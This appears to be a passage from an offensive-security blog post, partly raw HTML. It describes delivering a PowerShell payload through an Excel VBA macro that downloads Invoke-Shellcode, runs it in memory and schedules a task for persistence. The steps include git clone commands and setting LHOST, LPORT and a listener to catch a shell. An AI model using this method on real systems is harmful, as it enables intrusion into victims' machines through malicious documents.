href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheSTH8V15rPpYJPkTtwE1qvl5ZCWTu-zpc_bet6IQb-p7OzHNLfFuBImTztksckgFdiTvO8urVJXv-3wpVE7lanVSXxQSR7N1rkrImtl5u5Bhd9wJY1BhjZZ7R-JjDT9jrVN_LipXtljm9/s1600/regedit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="persist using regestiry" border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheSTH8V15rPpYJPkTtwE1qvl5ZCWTu-zpc_bet6IQb-p7OzHNLfFuBImTztksckgFdiTvO8urVJXv-3wpVE7lanVSXxQSR7N1rkrImtl5u5Bhd9wJY1BhjZZ7R-JjDT9jrVN_LipXtljm9/s1600/regedit.png" title="persist using regestiry" width="320" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Thanks to  <a href="https://twitter.com/enigma0x3">enigma0x3</a> for this awesome method.<br /><br /><span style="color: red;">Update</span> :- <span style="font-weight: normal;">New-Powershell-Payload-Excel-Delivery</span><br /><br /><span style="font-weight: normal;">This is a VBA macro that uses Matt Graeber's Invoke-Shellcode to execute a powershell payload in memory as well as schedule a task for persistence(20 min onidle  you get shell).</span><br /><div style="text-align: left;"></div>root@bt:~# <u>git clone https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery.git</u><br />root@bt:~# <u>cd Powershell-Payload-Excel-Delivery/</u><br /><br />Open MacroCode file & change Download URL for Invoke-Shellcode file & change LHOST & LPORT option. Now add macro-code in Excel file & start-up listener. </div></div>

Deliver powershell payload using macro.

In past we saw method of direct shell code execution in Ms word or Excel using macro ;but if document is closed then we will lose our shell ...

+ Read more »